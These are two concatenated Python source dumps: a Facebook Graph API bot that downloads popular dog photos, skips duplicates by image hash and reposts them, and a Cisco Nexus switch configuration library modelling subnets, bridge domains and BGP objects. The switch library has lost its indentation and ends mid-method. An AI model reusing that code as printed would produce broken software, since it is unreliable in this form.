{
  "source": "JonnyPugh/DogpostBot",
  "score": 3
}
#### File: DogpostBot/Project/download_photos.py
```python
from extensions import *
from requests import get
from urllib import urlretrieve
from dateutil import parser
from tzlocal import get_localzone
import os

downloads_log = open("downloads.log", "a+")

def get_request_json(url, extra_params):
    request = get(url, params=get_request_params(extra_params))
    request.raise_for_status()
    return request.json()

def get_photo(photo_id, directory, reactions, time_last_checked):
    # Get the reactions info of the picture to decide whether to download it
    if get_request_json(graph_url+photo_id+"/reactions", {"summary": "total_count"})["summary"]["total_count"] > reactions:
        # Get the picture url to download it
        url = get_request_json(graph_url+photo_id, {"fields": "images"})["images"][0]["source"]
        # Attempt to download the photo and if there
        # are any problems, keep retrying
        while True:
            try:
                urlretrieve(url, directory+photo_id+".jpg")
                break
            except:
                write_to_log(downloads_log, "Error downloading photo: "+photo_id+", retrying...")

def loop_through_json(json, time_last_checked, function, arg2, arg3):
    # Loop through all of the data in the json and call the specified function
    while json["data"]:
        for info in json["data"]:
            if parser.parse(info["created_time"]) > time_last_checked.replace(tzinfo=get_localzone()):
                function(info["id"], arg2, arg3, time_last_checked)
            else:
                break
        if "next" not in json["paging"]:
            break
        json = get_request_json(json["paging"]["next"], {})

def get_page_images(page_id, source_id, reactions, time_last_checked):
    # Create the directory to store the photos if it doesn't exist
    directory = images_directory+source_id+"/"
    if not os.path.exists(directory):
        os.makedirs(directory)
    # Go through all photos and download them if they match the criteria
    loop_through_json(get_request_json(graph_url+page_id+"/photos", {"type": "uploaded"}), time_last_checked, get_photo, directory, reactions)

def get_group_images(group_id, time_last_checked):
    # Go through all albums and download images
    loop_through_json(get_request_json(graph_url+group_id+"/albums", {}), time_last_checked, get_page_images, group_id, 25)

def get_reactions_threshold(page_id):
    # Use a threshold of 2% of the total likes on the page
    return get_request_json(graph_url+page_id, {"fields": "fan_count"})["fan_count"] / 50
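
# For example (illustrative numbers): a page with 10,000 fans gives a
# reaction threshold of 10000 / 50 = 200, i.e. 2% of the fan count.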

def main():
    # Get new photos from the sources
    for page in execute_query("select * from Sources"):
        page_id = page["id"]
        time_last_checked = page["time"]
        page_type = page["type"]
        if page_type == "page":
            get_page_images(page_id, page_id, get_reactions_threshold(page_id), time_last_checked)
        else:
            get_group_images(page_id, time_last_checked)
        execute_query("update Sources set time = current_timestamp where id = %s", (page_id,))
        write_to_log(downloads_log, "Finished downloading new images from "+page_type+": "+page_id)
    write_to_log(downloads_log, "Finished downloading new images from all sources")

if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        write_to_log(downloads_log, "Unexpected error caught while downloading photos: "+str(e))
```
#### File: DogpostBot/Project/make_post.py
```python
from extensions import *
from random import choice
from sets import Set
from PIL import Image
from imagehash import average_hash
from requests import post
import os

error_log = open("error.log", "a+")

def main():
    # Form a set of the hashes of all posted photos to check for duplicates
    hashes = Set([post_info["hash"] for post_info in execute_query("select hash from Posts")])
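    # Note: str(average_hash(...)) used below yields the hex digest of an
    # image's perceptual hash (e.g. "ffd8806000000000", illustrative), so
    # visually identical photos compare equal even if the files differ.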
    # Choose an image to post
    while True:
        try:
            # Choose a random source and image from that source
            source = choice(os.listdir(images_directory))
            source_directory = images_directory+source
            files = os.listdir(source_directory)
            if not files:
                continue
            filename = choice(files)
            filepath = source_directory+"/"+filename
            file_hash = str(average_hash(Image.open(filepath)))
            if file_hash not in hashes:
                break
            write_to_log(error_log, "Deleting photo that has already been posted with hash: "+file_hash)
        except:
            write_to_log(error_log, "Deleting unopenable photo: "+filepath)
        # Delete this photo if it is a duplicate of another
        # one that has already been posted or if it is unopenable
        os.remove(filepath)
    # Post the photo, insert its data into the database, delete it, and log it
    data = get_request_params({
        "tags[]": [] if source == "no_source" else [{"tag_uid": source}]
    })
    files = {
        "source": open(filepath, "rb")
    }
    r = post(graph_url+page_id+"/photos", data=data, files=files)
    r.raise_for_status()
    post_id = r.json()["id"]
    execute_query("insert into Posts (hash, filename, source, id) values (%s, %s, %s, %s)", (file_hash, filename, "NULL" if source == "no_source" else source, post_id))
    os.remove(filepath)
    write_to_log(open("posts.log", "a+"), "Finished making post with id: "+post_id)

if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        write_to_log(error_log, "Unexpected error caught while making a post: "+str(e))
```

{
  "source": "jonnyrocks/nxtoolkit",
  "score": 2
}
#### File: nxtoolkit/nxtoolkit/nxtoolkit.py
```python
import sys
from .nxTable import Table
from .nxphysobject import *
from .nxbaseobject import BaseNXObject, BaseRelation, BaseInterface
from .nxsession import Session
from .nxtoolkitlib import Credentials
import copy  # used by PortChannel.__init__ below (copy.deepcopy of the interfaces list)
import logging
import json
import socket
def cmdline_login_to_apic(description=''):
# Take login credentials from the command line if provided
# Otherwise, take them from your environment variables file ~/.profile
creds = Credentials('apic', description)
args = creds.get()
# Login to Switch
session = Session(args.url, args.login, args.password)
resp = session.login()
if not resp.ok:
print('%% Could not login to Switch')
sys.exit(0)
return session
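# Typical usage (illustrative): the returned Session can then be used to issue
# REST calls to the switch, e.g. session.get('/api/mo/sys.json').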
class Subnet(BaseNXObject):
""" Subnet : roughly equivalent to fvSubnet """
def __init__(self, subnet_name, parent=None):
"""
:param subnet_name: String containing the name of this Subnet instance
:param parent: An instance of BridgeDomain class representing the\
BridgeDomain which contains this Subnet.
"""
super(Subnet, self).__init__(subnet_name, parent)
self._addr = None
self._scope = None
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('fvSubnet')
return resp
def get_addr(self):
"""
Get the subnet address
:returns: The subnet address as a string in the form of <ipaddr>/<mask>
"""
return self._addr
def set_addr(self, addr):
"""
Set the subnet address
:param addr: The subnet address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._addr = addr
def get_scope(self):
"""
Get the subnet scope
:returns: The subnet scope as a string
"""
return self._scope
def set_scope(self, scope):
"""
Set the subnet scope
:param scope: The subnet scope. It can be either "public", "private" or "shared".
"""
if scope is None:
raise TypeError('Scope can not be set to None')
self._scope = scope
def get_json(self):
"""
Returns json representation of the subnet
:returns: json dictionary of subnet
"""
attributes = self._generate_attributes()
if self.get_addr() is None:
raise ValueError('Subnet address is not set')
attributes['ip'] = self.get_addr()
if self.get_scope() is not None:
attributes['scope'] = self.get_scope()
return super(Subnet, self).get_json('fvSubnet', attributes=attributes)
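# A minimal usage sketch (values are illustrative): build a Subnet, set its
# address and scope, and attach it to an existing bridge domain.
#   sub = Subnet('my_subnet')
#   sub.set_addr('10.1.1.1/24')
#   sub.set_scope('public')
#   bd.add_subnet(sub)   # 'bd' is assumed to be an existing L2BD instance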
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_addr(str(attributes.get('ip')))
@classmethod
def get(cls, session, bridgedomain, tenant):
"""
Gets all of the Subnets from the Switch for a particular tenant and
bridgedomain.
:param session: the instance of Session used for Switch communication
:param bridgedomain: the instance of BridgeDomain used to limit the\
Subnet instances retrieved from the Switch
:param tenant: the instance of Tenant used to limit the Subnet\
instances retrieved from the Switch
:returns: List of Subnet objects
"""
return BaseNXObject.get(session, cls, 'fvSubnet',
parent=bridgedomain, tenant=tenant)
class L3Inst(BaseNXObject):
""" L3Inst or VRF: roughly equivalent to ACI Context """
def __init__(self, l3inst_name, parent=None):
"""
:param l3inst_name: String containing the L3Inst name
:param parent: An instance of Tenant class representing the Tenant
which contains this L3Inst.
"""
super(L3Inst, self).__init__(l3inst_name, parent)
self.name = l3inst_name
self.adminState = 'admin-up'
self._children = []
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l3Inst')
return resp
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Nexus class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {}
@staticmethod
def _get_parent_class():
"""
Gets the class of the parent object
:returns: class of parent object
"""
return None
@staticmethod
def get_url(fmt='json'):
"""
Get the URL used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/uni.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
return '/api/mo/sys.' + fmt
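# For example, get_url() returns '/api/mo/sys.json' and get_url('xml')
# returns '/api/mo/sys.xml'.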
@staticmethod
def _get_parent_dn(dn):
return dn.split('/ctx-')[0]
@staticmethod
def _get_name_from_dn(dn):
return dn.split('/ctx-')[1].split('/')[0]
@staticmethod
def _get_tenant_from_dn(dn):
"""
Get the tenant name from the DN
:param dn: String containing the DN
:return: string containing the tenant name
"""
return dn.split('/tn-')[1].split('/')[0]
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.descr = attributes.get('descr')
self.known_mcast = attributes.get('knwMcastAct')
self.modified_time = attributes.get('modTs')
self.name = attributes.get('name')
self.class_id = attributes.get('pcTag')
self.scope = attributes.get('scope')
self.vnid = attributes.get('seg')
dn = attributes.get('dn')
if dn is not None:
self.tenant = self._get_tenant_from_dn(dn)
else:
self.tenant = None
if attributes.get('pcEnfPref') == 'unenforced':
allow_all = True
else:
allow_all = False
self.set_allow_all(allow_all)
def get_json(self):
"""
Returns json representation of fvCtx object
:returns: json dictionary of fvCtx object
"""
attributes = self._generate_attributes()
return super(L3Inst, self).get_json(self._get_switch_classes()[0],
attributes=attributes)
@classmethod
def get(cls, session, tenant=None):
"""
Gets all of the L3Insts from the Switch.
:param session: the instance of Session used for Switch communication
:param tenant: the instance of Tenant used to limit the L3Insts\
retrieved from the Switch
:returns: List of L3Inst objects
"""
return BaseNXObject.get(session, cls, cls._get_switch_classes()[0],
tenant, tenant)
@staticmethod
def get_table(l3insts, title=''):
"""
Will create table of l3inst information
:param title:
:param l3insts:
"""
headers = ['Tenant',
'L3Inst',
'VNID', 'Scope', 'Class ID',
'Allow All',
'Known MCST', 'Modified Time',
]
data = []
for l3inst in sorted(l3insts):
data.append([
l3inst.get_parent().name,
l3inst.name,
l3inst.vnid,
l3inst.scope,
l3inst.class_id,
l3inst.allow_all,
l3inst.known_mcast,
l3inst.modified_time
])
data = sorted(data)
table = Table(data, headers, title=title + 'L3Inst')
return [table, ]
class L2BD(BaseNXObject):
"""
L2BD: roughly equivalent to ACI BD
"""
def __init__(self, bd_name, parent=None):
"""
:param bd_name: String containing the name of this L2BD
object.
:param parent: An instance of Tenant class representing the Tenant
which contains this L2BD.
"""
super(L2BD, self).__init__(bd_name, parent)
self.adminSt = 'active'
self.operSt = 'Down'
self.fabEncap = bd_name
self.bd_name = bd_name
self.unkMacUcastAct = 'flood'
self.unkMcastAct = 'flood'
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l2BD')
return resp
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'fvSubnet': Subnet, }
@staticmethod
def _get_parent_class():
"""
Gets the class of the parent object
:returns: class of parent object
"""
return L3Inst
@staticmethod
def _get_parent_dn(dn):
return dn.split('/bd-')[0]
@staticmethod
def _get_name_from_dn(dn):
return dn.split('/bd-')[1].split('/')[0].split('[')[1].split(']')[0]
def set_unknown_mac_unicast(self, unicast):
"""
Set the unknown mac unicast for this BD
:param unicast: Unicast to assign this L2BD
"""
valid_unicast = ('flood',)
if unicast not in valid_unicast:
raise ValueError('unknown MAC unicast must be one of: %s' % (valid_unicast,))
self.unkMacUcastAct = unicast
def get_unknown_mac_unicast(self):
"""
Gets the unknown mac unicast for this BD
:returns: unknown mac unicast of the L2BD
"""
return self.unkMacUcastAct
def set_unknown_multicast(self, multicast):
"""
Set the unknown multicast for this BD
:param multicast: Multicast to assign this L2BD
"""
valid_multicast = ('flood', 'opt-flood')
if multicast not in valid_multicast:
raise ValueError('unknown multicast must be one of: %s or %s' % valid_multicast)
self.unkMcastAct = multicast
def get_unknown_multicast(self):
"""
Gets the unknown multicast for this BD
:returns: unknown multicast of the L2BD
"""
return self.unkMcastAct
def get_json(self):
"""
Returns json representation of the bridge domain
:returns: json dictionary of bridge domain
"""
children = []
attr = self._generate_attributes()
attr['unkMacUcastAct'] = self.unkMacUcastAct
attr['unkMcastAct'] = self.unkMcastAct
attr['adminSt'] = self.adminSt
attr['fabEncap'] = self.fabEncap
attr['id'] = self.bd_name.split('-')[1]
return super(L2BD, self).get_json(self._get_switch_classes()[0],
attributes=attr,
children=children)
def _extract_relationships(self, data):
vrf_children = data[0]['l3Inst']['children']
for child in vrf_children:
if 'l2BD' in child:
bd_name = child['l2BD']['attributes']['name']
if bd_name == self.name:
bd_children = child['l2BD']['children']
for bd_child in bd_children:
bd_name = self.name
break
super(L2BD, self)._extract_relationships(data)
# Subnet
def add_subnet(self, subnet):
"""
Add a subnet to this BD.
:param subnet: Instance of Subnet class to add to this L2BD.
"""
if not isinstance(subnet, Subnet):
raise TypeError('add_subnet requires a Subnet instance')
if subnet.get_addr() is None:
raise ValueError('Subnet address is not set')
if subnet in self.get_subnets():
return
self.add_child(subnet)
def remove_subnet(self, subnet):
"""
Remove a subnet from this BD
:param subnet: Instance of Subnet class to remove from this\
L2BD.
"""
if not isinstance(subnet, Subnet):
raise TypeError('remove_subnet requires a Subnet instance')
self.remove_child(subnet)
def get_subnets(self):
"""
Get all of the subnets on this BD.
:returns: List of Subnet instances assigned to this L2BD.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, Subnet):
resp.append(child)
return resp
def has_subnet(self, subnet):
"""
Check if the BD has this particular subnet.
:returns: True or False. True if this L2BD has this\
particular Subnet.
"""
if not isinstance(subnet, Subnet):
raise TypeError('has_subnet requires a Subnet instance')
if subnet.get_addr() is None:
raise ValueError('Subnet address is not set')
return self.has_child(subnet)
@classmethod
def get(cls, session):
"""
Gets all of the Bridge Domains from the Switch.
:param session: the instance of Session used for Switch communication
:returns: List of L2BD objects
"""
return BaseNXObject.get(session, cls, cls._get_switch_classes()[0])
def _get_url_extension(self):
return '/bd-[%s]' % self.name
def get_url(self, fmt='.json'):
# Default inst is used
return '/api/node/mo/sys/inst-default' + self._get_url_extension() + fmt
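# For example, an L2BD named 'bd-10' (illustrative) is pushed to
# '/api/node/mo/sys/inst-default/bd-[bd-10].json'; note that get_json() above
# derives the numeric id from the part of the name after '-'.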
def _populate_from_attributes(self, attributes):
"""
Populates various attributes
:param attributes:
:return:
"""
self.class_id = attributes.get('pcTag')
self.bridgeMode = attributes.get('bridgeMode')
self.hw_id = attributes.get('hwId')
self.id = attributes.get('id')
self.adminSt = attributes.get('adminSt')
self.operSt = attributes.get('operSt')
self.unkMacUcastAct = attributes.get('unkMacUcastAct')
self.unkMcastAct = attributes.get('unkMcastAct')
self.modified_time = attributes.get('modTs')
@staticmethod
def get_table(bridge_domains, title=''):
"""
Will create table of l3inst information
:param title:
:param bridge_domains:
"""
headers = ['ID',
'HW ID',
'Admin',
'Oper',
'Subnets',
'Bridge Mode',
'Unknown UCST',
'Unknown MCST',
]
data = []
for bridge_domain in sorted(bridge_domains):
subnets = bridge_domain.get_subnets()
subnet_str = []
for subnet in subnets:
subnet_str.append(subnet.get_addr())
data.append([
bridge_domain.id,
bridge_domain.hw_id,
bridge_domain.adminSt,
bridge_domain.operSt,
', '.join(subnet_str),
bridge_domain.bridgeMode,
bridge_domain.unkMacUcastAct,
bridge_domain.unkMcastAct,
])
data = sorted(data)
table = Table(data, headers, title=title + 'Bridge Domains')
return [table, ]
class ConfigBDs(BaseNXObject):
"""
This class is used to configure multiple bridge domains at a time
"""
def __init__(self, name=None):
if not name:
name = ""
super(ConfigBDs, self).__init__(name=name)
self.obj_name = 'bdEntity'
def add_l2bds(self, bd):
if not isinstance(bd, L2BD):
raise TypeError('An L2BD instance is required')
self._children.append(bd)
def get_url(self):
return '/api/node/mo/sys.json'
def get_json(self):
return super(ConfigBDs, self).get_json(self.obj_name)
class BGPPeerAF(BaseNXObject):
""" BGPPeerAF : roughly equivalent to bgpPeerAf """
def __init__(self, type, parent=None):
"""
:param type: String containing the address family type of this BGPPeerAF instance.
:param parent: An instance of BGPPeer class representing the\
BGPPeer which contains this BGPPeerAf.
"""
if not isinstance(parent, BGPPeer):
raise TypeError('Parent of BGPPeerAF class must be BGPPeer')
super(BGPPeerAF, self).__init__(type, parent)
self._type = type
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpPeerAf')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPPeer
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {}
def _get_url_extension(self):
return '/af-%s' % self._type
def get_type(self):
"""
Get the bgpPeerAf type
:returns: The bgpPeerAf type as a string
"""
return self._type
def set_type(self, af_type):
"""
Set the bgpPeer type
:param type: The bgpPeerAf type as a string
"""
if af_type is None:
raise TypeError('AF Type can not be set to None')
valid_af_types = ['ipv4-ucast', 'l2vpn-evpn']
if af_type not in valid_af_types:
raise ValueError('AF type specified is not valid')
self._type = af_type
def get_json(self):
"""
Returns json representation of the bgpPeerAf
:returns: json dictionary of bgpPeerAf
"""
attributes = self._generate_attributes()
if self.get_type() is None:
raise ValueError('BGPPeerAF type is not set')
attributes['type'] = self.get_type()
return super(BGPPeerAF, self).get_json('bgpPeerAf', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_type(str(attributes.get('type')))
@classmethod
def get(cls, session, bgppeer, tenant):
"""
Gets all of the BGPPeerAFs from the Switch for a particular BGPPeer
:param session: the instance of Session used for Switch communication
:param bgppeer: the instance of BGPPeer using the AF
:returns: List of BGPPeerAF objects
"""
return BaseNXObject.get(session, cls, 'bgpPeerAf', parent=bgppeer)
class BGPPeer(BaseNXObject):
""" BGPPeer : roughly equivalent to bgpPeer """
def __init__(self, addr, parent=None):
"""
:param addr: String containing the address of this BGPPeer
instance.
:param parent: An instance of BGPDomain class representing the\
BGPDomain which contains this BGPPeer.
"""
#TBD: Validation of address
if not isinstance(parent, BGPDomain):
raise TypeError('Parent of BGPPeer class must be BGPDomain')
super(BGPPeer, self).__init__(addr, parent)
self._addr = addr
self._remote_as = None
self._adminSt = 'enabled'
self._src_if = None
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpPeer')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPDomain
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'bgpPeerAf': BGPPeerAF}
def _get_url_extension(self):
return '/peer-[%s]' % self._addr
def get_addr(self):
"""
Get the bgpPeer address
:returns: The bgpPeer address as a string in the form of <ipaddr>/<mask>
"""
return self._addr
def set_addr(self, addr):
"""
Set the bgpPeer address
:param addr: The bgpPeer address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._addr = addr
def get_remote_as(self):
"""
Get the bgpPeer remote-as
:returns: The bgpPeer remote-as as a string
"""
return self._remote_as
def set_remote_as(self, remote_as):
"""
Set the bgpPeer remote-as
:param remote-as: The bgpPeer remote-as.
"""
if remote_as is None:
raise TypeError('remote-as can not be set to None')
self._remote_as = remote_as
def get_src_if(self):
"""
Get the bgpPeer source interface
:returns: The bgpPeer source interface as a string
"""
return self._src_if
def set_src_if(self, src_if):
"""
Set the bgpPeer source interface
:param src_if: The bgpPeer source interface
"""
if src_if is None:
raise TypeError('src-if can not be set to None')
self._src_if = src_if
# AF
def add_af(self, af):
"""
Add a af to this BGP Peer.
:param af: Instance of BGPPeerAF class to add to this bgpInst.
"""
if not isinstance(af, BGPPeerAF):
raise TypeError('add_af requires a BGPPeerAF instance')
if af.get_type() is None:
raise ValueError('BGPPeerAF Type is not set')
if af in self.get_afs():
return
self.add_child(af)
def remove_af(self, af):
"""
Remove a af from this BGP Peer
:param af: Instance of BGPPeerAF class to remove from this\
bgpInst.
"""
if not isinstance(af, BGPPeerAF):
raise TypeError('remove_af requires a BGPPeerAF instance')
self.remove_child(af)
def get_afs(self):
"""
Get all of the afs on this BGP Peer.
:returns: List of BGPPeerAF instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPPeerAF):
resp.append(child)
return resp
def has_af(self, af):
"""
Check if the BGP Peer has this particular af.
:returns: True or False. True if this bgpInst has this\
particular BGPPeerAF.
"""
if not isinstance(af, BGPPeerAF):
raise TypeError('has_af requires a BGPPeerAF instance')
if af.get_type() is None:
raise ValueError('BGPPeerAF type is not set')
return self.has_child(af)
def get_json(self):
"""
Returns json representation of the bgpPeer
:returns: json dictionary of bgpPeer
"""
attributes = self._generate_attributes()
if self.get_addr() is None:
raise ValueError('BGPPeer address is not set')
attributes['addr'] = self.get_addr()
if self.get_remote_as() is not None:
attributes['asn'] = self.get_remote_as()
if self.get_src_if() is not None:
attributes['srcIf'] = self.get_src_if()
return super(BGPPeer, self).get_json('bgpPeer', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_addr(str(attributes.get('addr')))
self.set_remote_as(str(attributes.get('asn')))
self.set_src_if(str(attributes.get('srcIf')))
@classmethod
def get(cls, session, bgpdomain):
"""
Gets all of the BGPPeers from the Switch for a particular BGPDomain
:param session: the instance of Session used for Switch communication
:param bgpdomain: the instance of BGPDomain used to limit the\
BGPPeer instances retrieved from the Switch
:returns: List of BGPPeer objects
"""
return BaseNXObject.get_filtered(session, cls,
cls._get_switch_classes()[0], bgpdomain)
class BGPAdvPrefix(BaseNXObject):
""" BGPAdvPrefix : roughly equivalent to bgpAdvPrefix """
def __init__(self, addr, parent=None):
"""
:param addr: String containing the address of this Prefix
:param parent: An instance of BGPDomainAF class representing the\
BGPDomain Address Family which contains this prefix.
"""
#TBD: Validation of address
if not isinstance(parent, BGPDomainAF):
raise TypeError('Parent of BGPAdvPrefix class must be BGPDomainAF')
super(BGPAdvPrefix, self).__init__(addr, parent)
self._addr = addr
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpAdvPrefix')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPDomainAF
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {}
def _get_url_extension(self):
return '/prefix-[%s]' % self._addr
def get_addr(self):
"""
Get the bgpPeer address
:returns: The bgpPeer address as a string in the form of <ipaddr>/<mask>
"""
return self._addr
def set_addr(self, addr):
"""
Set the bgpPeer address
:param addr: The bgpPeer address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._addr = addr
def get_json(self):
"""
Returns json representation of the bgpAdvPrefix
:returns: json dictionary of bgpAdvPrefix
"""
attributes = self._generate_attributes()
if self.get_addr() is None:
raise ValueError('BGPAdvPrefix address is not set')
attributes['addr'] = self.get_addr()
return super(BGPAdvPrefix, self).get_json('bgpAdvPrefix', attributes=attributes)
def _generate_attributes(self):
attributes = {}
attributes['addr'] = self._addr
return attributes
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_addr(str(attributes.get('addr')))
@classmethod
def get(cls, session, bgpdomainaf):
"""
Gets all of the BGPAdvPrefix from the Switch for a particular BGPDomainAF
:param session: the instance of Session used for Switch communication
:param bgpdomainaf: the instance of BGPDomainAF used to limit the\
BGPAdvPrefix instances retrieved from the Switch
:returns: List of BGPAdvPrefix objects
"""
return BaseNXObject.get(session, cls, 'bgpAdvPrefix', parent=bgpdomainaf)
class BGPDomainAF(BaseNXObject):
""" BGPDomainAF : roughly equivalent to bgpDomAf """
def __init__(self, af_type, parent=None):
"""
:param af_type: String containing the AF type of this BGPDomainAF
instance.
:param parent: An instance of BGPDomain class representing the\
BGPDomain which contains this BGPDomainAF.
"""
if not isinstance(parent, BGPDomain):
raise TypeError('Parent of BGPDomainAF class must be BGPDomain')
super(BGPDomainAF, self).__init__(af_type, parent)
self._type = af_type
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpDomAf')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPDomain
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'bgpAdvPrefix': BGPAdvPrefix}
def _get_url_extension(self):
return '/af-%s' % self.name
def get_type(self):
"""
Get the bgpDomAf type
:returns: The bgpDomAf type as a string
"""
return self._type
def set_type(self, af_type):
"""
Set the bgpDomAf type
:param type: The bgpDomAf type as a string
"""
if af_type is None:
raise TypeError('AF Type can not be set to None')
valid_af_types = ['ipv4-ucast', 'l2vpn-evpn']
if af_type not in valid_af_types:
raise ValueError('AF type specified is not valid')
self._type = af_type
# BGPAdvPrefix
def add_adv_prefix(self, adv_prefix):
"""
Add a adv_prefix to this BGPDomainAF.
:param adv_prefix: Instance of BGPAdvPrefix class to add to this BGPDomainAF.
"""
if not isinstance(adv_prefix, BGPAdvPrefix):
raise TypeError('add_adv_prefix requires a BGPAdvPrefix instance')
if adv_prefix.get_addr() is None:
raise ValueError('BGPAdvPrefix address is not set')
if adv_prefix in self.get_adv_prefixs():
return
self.add_child(adv_prefix)
def remove_adv_prefix(self, adv_prefix):
"""
Remove a adv_prefix from this BGPDomainAF
:param adv_prefix: Instance of BGPAdvPrefix class to remove from this\
BGPDomainAF.
"""
if not isinstance(adv_prefix, BGPAdvPrefix):
raise TypeError('remove_adv_prefix requires a BGPAdvPrefix instance')
self.remove_child(adv_prefix)
def get_adv_prefixs(self):
"""
Get all of the adv_prefixs on this BGPDomainAF.
:returns: List of BGPAdvPrefix instances assigned to this BGPDomainAF.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPAdvPrefix):
resp.append(child)
return resp
def has_adv_prefix(self, adv_prefix):
"""
Check if the BGPDomainAF has this particular adv_prefix.
:returns: True or False. True if this BGPDomainAF has this\
particular BGPAdvPrefix.
"""
if not isinstance(adv_prefix, BGPAdvPrefix):
raise TypeError('has_adv_prefix requires a BGPAdvPrefix instance')
if adv_prefix.get_addr() is None:
raise ValueError('BGPAdvPrefix address is not set')
return self.has_child(adv_prefix)
def get_json(self):
"""
Returns json representation of the bgpDomAf
:returns: json dictionary of bgpDomAf
"""
attributes = self._generate_attributes()
if self.get_type() is None:
raise ValueError('BGPDomainAF type is not set')
attributes['type'] = self.get_type()
return super(BGPDomainAF, self).get_json('bgpDomAf', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_type(str(attributes.get('type')))
@classmethod
def get(cls, session, bgpdomain):
"""
Gets all of the BGPDomainAF from the Switch for a particular BGPDomain
:param session: the instance of Session used for Switch communication
:param bgpdomain: the instance of BGPDomain using the AF
:returns: List of BGPDomainAF objects
"""
return BaseNXObject.get_filtered(session, cls,
cls._get_switch_classes()[0], bgpdomain)
class BGPDomain(BaseNXObject):
"""
Creates an BGP router interface that can be attached to a L3 interface.
This interface defines the BGP AS, authentication, etc.
"""
def __init__(self, name, parent=None):
"""
:param name: String containing the name of this BGPDomain object.
:param as_num: String containing the IPv4 as_num
:param peer_ip: String containing the IP address of the BGP peer
Default is None.
:param node_id: String Containing the node-id (e.g. '101')
"""
super(BGPDomain, self).__init__(name, parent)
self._name = name
self.options = ''
self.networks = []
@staticmethod
def is_bgp():
"""
:returns: True if this interface is an BGP Session. In the case\
of BGPDomain instances, this is always True.
"""
return True
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpDom')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPSession
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'bgpDomAf': BGPDomainAF,
'bgpPeer': BGPPeer}
def _get_url_extension(self):
return '/dom-%s' % self._name
# Name
def get_name(self):
"""
Get the bgpDomain Name
:returns: The bgpDomain Name as a string
"""
return self._name
def set_name(self, name):
"""
Set the bgpDomain Name
:param name: The bgpDomain Name as a string
"""
if name is None:
raise TypeError('Name can not be set to None')
self._name = name
# Router ID
def get_router_id(self):
"""
Get the bgpDomain router ID
:returns: The router ID as a string
"""
return self._router_id
def set_router_id(self, addr):
"""
Set the bgpDomain router ID
:param addr: The router ID as a string
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._router_id = addr
# Peer
def add_peer(self, peer):
"""
Add a peer to this BGP Domain.
